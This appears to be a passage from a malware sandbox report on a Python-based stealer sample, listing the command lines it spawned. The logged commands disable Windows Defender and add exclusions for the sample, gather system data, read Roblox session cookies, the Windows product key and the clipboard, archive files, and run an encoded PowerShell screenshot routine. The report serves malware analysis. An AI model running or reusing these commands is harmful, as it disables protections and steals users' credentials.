Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhah